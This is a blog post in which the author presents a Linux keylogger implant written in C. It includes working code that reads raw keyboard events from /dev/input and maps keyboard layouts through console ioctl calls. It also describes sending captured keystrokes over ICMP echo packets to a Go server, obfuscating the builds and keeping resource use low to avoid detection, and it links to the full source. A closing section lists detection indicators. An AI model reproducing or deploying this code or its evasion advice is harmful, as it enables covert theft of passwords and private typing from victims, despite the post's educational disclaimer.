making a keylogger for linux

Hello again, today I’d like to share on a project I’ve been working on, on and off for a long time.

Every now and then, I would pick up again this project but I think it is now in a releasable state. First, let’s see a short demo, from yours truly.

As you can see, it is a userland keylogger, written in C. Let’s go over key features, how they were implemented and how it could be improved in the future.

mandatory disclaimer

In practice, this software will be detected. you wont get any use from deploying this. This is just meant as a demonstration on how malware for linux can be written, and to satisfy my personal curiosity. I have decided to open-source this so that others can learn from it too but it would be extremely dumb from you to deploy it and use it against an oblivious victim (and also very illegal).

Please only use this to learn about Linux’s internals, like I have and run it in a Virtual Machine or a Linux environment you own that is safe to infect.

I do not endorse the use of security tools for malicious use, nor do i wish to be responsible for your stupidity. thank u <3

the server

The server’s code is pretty boring. It receives ICMP packets and prints the content of the Data field when you receive an “Echo” request. This is where the data is exfiltrated.

I’ve chosen Golang because I’ve used it for other projects in the past, it’s a solid and readable language with a very complete standard library.

If you want to implement your own server, you’re free to use whatever you want. It really doesn’t matter at all what you use, because it’s pretty much the most boring part of the project. My goal here is just to receive ICMP traffic, parse it and print it. You could just use tcpdump if you want.

the implant itself

Now, onto the most interesting part.

We have two modes, the debug and prod builds.

DEBUG mode

A debug mode is supported to allow for a simpler development. To compile a debug binary, run make fclean && make debug in the mazepa-implant directory.

It allowed me to have some debug logs (I just used syslog for this), CLI input management, and it compiles with debug flags, to troubleshoot memory issues. You can easily use it with valgrind to find memory leaks, or issues in the implant:

sudo valgrind ./implant -i 192.168.122.1

Yes, you need root rights to run this. More on that later.

As opposed to the debug binary, we compile “production” binaries with flags optimized for obfuscation. Since the binary is also compiled statically, we can obviously strip it, and make it harder to reverse.

Finding and reading from keyboards

There are many techniques out there to read directly from the keyboard. First, you have to remember, everything on Linux is a file. So it’s just a matter of calling read on the correct file, so to say.

Keyboards usually live in /dev/input/by-path/*-kbd, you can just open on this file after having resolved the correct path (It’s actually a file descriptor !). This will give you every input (Source here) that the keyboard has received. From there it’s fairly trivial to just read the payload:

static void
handle_key_event(keymap_cache_t *cache, struct input_event *ev, ringbuf_t *rb, int *shift_held) {
    char ch;

    if (ev->type != EV_KEY)
        return;

    if (ev->code == KEY_LEFTSHIFT || ev->code == KEY_RIGHTSHIFT) {
        *shift_held = (ev->value != KEY_RELEASED);
        return;
    }

    if (ev->value != KEY_PRESSED)
        return;

    ch = keycode_to_char(cache, ev->code, *shift_held);
    if (ch != 0)
        ringbuf_push(rb, (uint8_t)ch);
}

uint8_t
evloop_run(implant_t *instance) {
    struct epoll_event events[MAX_EVENTS];
    struct input_event ev;
    keymap_cache_t keymap = {0};
    ringbuf_t ringbuf = {0};
    int nfds;

    // ommitted from brievity ...


    for (int i = 0; i < nfds; i++) {
        ssize_t bytes = read(events[i].data.fd, &ev, sizeof(ev));
        if (bytes != sizeof(ev))
            continue;

        handle_key_event(&keymap, &ev, &ringbuf, &shift_held);

        // ommitted from brievity ...
    }

}

As you can see, you can just read from ev.code and ev.value to get an idea of what event happened (eg: was a key pressed or released ?).

Then, you keep this information in memory, because if SHIFT is pressed but not released, then you surely have to take that into account when other keys are pressed ! That is, of course, if you care about knowing if the user has typed a number or a symbol, or if they wrote in caps or not.

Getting the current language

This approach has a few problems though, that most projects out there could not solve from what I have seen. So, because I am very nice, I decided to share my technique for resolving this problem. You’re welcome, dear reader.

What is the problem, you ask ? Well, this approach of blindly reading from our keyboard file descriptor only works if the user has a qwerty keyboard. If they have (for example) a french keyboard, with an AZERTY layout, the key-to-code mapping will be different and you will get the wrong keys extracted !

I initally tried to use libxkbmap because it was mentionnned here. It worked fairly well to read the same type of events, and get the correct key mapping but it had several drawbacks:

we need libxkbmap-common installed on the victim machine, which is not a guarantee,
we cannot get static binaries anymore & strip function names, since it won’t resolve the ones from your dynamic library.

To solve this, I have a really dumb solution: you make a keymap struct, open the console and ioctl your way into identifying the important keys:

typedef struct {
    char normal[KEYMAP_SIZE];
    char shifted[KEYMAP_SIZE];
} keymap_cache_t;

static int
open_console(void) {
    /* you can add others here, i just got lazy */
    const char *consoles[] = {"/dev/tty0", "/dev/console", "/dev/tty", NULL};

    for (int i = 0; consoles[i] != NULL; i++) {
        int fd = open(consoles[i], O_RDONLY | O_NOCTTY);
        if (fd >= 0) {
            return fd;
        }
    }
    return -1;
}

static void
cache_keymap(int console_fd, keymap_cache_t *cache) {
    struct kbentry entry = {0};

    memset(cache, 0, sizeof(*cache));

    /* let's make these a bit more readable. */
    cache->normal[KEY_ENTER] = '\n';
    cache->normal[KEY_KPENTER] = '\n';
    cache->normal[KEY_TAB] = '\t';
    cache->normal[KEY_SPACE] = ' ';
    cache->shifted[KEY_ENTER] = '\n';
    cache->shifted[KEY_KPENTER] = '\n';
    cache->shifted[KEY_TAB] = '\t';
    cache->shifted[KEY_SPACE] = ' ';

    for (int code = 0; code < KEYMAP_SIZE; code++) {
        if (cache->normal[code] != 0)
            continue;

        entry.kb_table = K_NORMTAB;
        entry.kb_index = (unsigned char)code;

        /* we get the correct code here. */
        if (ioctl(console_fd, KDGKBENT, &entry) == 0) {
            unsigned char type = KTYP(entry.kb_value);
            if (type == KT_LETTER || type == KT_LATIN) {
                cache->normal[code] = (char)KVAL(entry.kb_value);
            }
        }

        entry.kb_table = K_SHIFTTAB;
        entry.kb_index = (unsigned char)code;

        /* We do the safe but for SHIFT key */
        if (ioctl(console_fd, KDGKBENT, &entry) == 0) {
            unsigned char type = KTYP(entry.kb_value);
            if (type == KT_LETTER || type == KT_LATIN)
                cache->shifted[code] = (char)KVAL(entry.kb_value);
        }
    }
}

Obviously, this makes for a LOT of ioctl calls, so we cache it to avoid having to send so many call all the time. This means that, currently, there is no way to refresh the keymap, but this has worked fairly well, from my testing as long as you use Latin languages. I haven’t tested it with languages with different alphabet systems, like russian or chinese.

ICMP exfil

We’ve talked about ICMP before on this blog. From my own experience, it is a protocol sometimes overlooked (especially IPv6 – moreover, there are a few differences between ICMP and ICMPv6 that you could use to your advantage), which is why I went with it. The exfiltration part is not that fascinating honestly. We just put what we currently read into a ring-buffer and periodically flush it. When it is being flushed, we send an ICMP message to our server, and store in the Data field on a Echo request our payload.

You could use absolutely anything else for this part. HTTP or DNS are also very acceptable, and rarely detected on their own, if you mask the request well.

Managing ressources

Generally when making implants, it’s best to avoid using too much ressources. Those draw attention. An admin is more likely to connect and start snooping around on a machine that has a high-CPU usage to understand what’s the cause of it. So, one of the keys to not get detected is to write efficient software. That being said, I am still in the process of cleaning things up lol.

In general, you should avoid:

making too many syscalls at once (eg: don’t call write for EVERY key typed, try to delay and call write multiple characters – I know, shocker…)
heap allocations. Of course, the heap is very nice (and I do use it in the projecct) to get large amounts of memory, but the process of just getting that memory is not free. If you can, just use the stack for what you need. It can work better than you think.
pay attention to your memory leaks ! If you still decide to use malloc et al, make sure you actually free the memory / close the file descriptors in case of error, etc. Those issues add up, and will lead to your program crashing.

Detection methods / IoCs

There are several ways to detect the usage of this implant, in it current form:

some strings in the binary /dev/tty0, /dev/input/by-path, …) indicate what this program is looking for,
the ICMP exfil is not encrypted, you can just see the contents in plaintext,
several ioctl calls at the beginning to get the keyboard layout is quite noisy,
any anti-virus worth its salt would be hooking read et al, and see what you are reading from.

There are other methods that I have in mind, but I am not going to give you everything ! If you want to make it better, then get your hands dirty yourself;)

Conclusion

As you can see, we’ve discussed several things. All of which can be improved. I might work on it, or not. Again, this is just something I did for my own curiosity. I am merely releasing it, and writing about it to share the knowledge I’ve gained by working on this.

As always, making projets like these is very fun, and I look forward to making more.

You can check the source code at these addresses:

https://github.com/djnnvx/mazepa
https://evil.djnn.sh/mazepa/README.html

See you next time:)~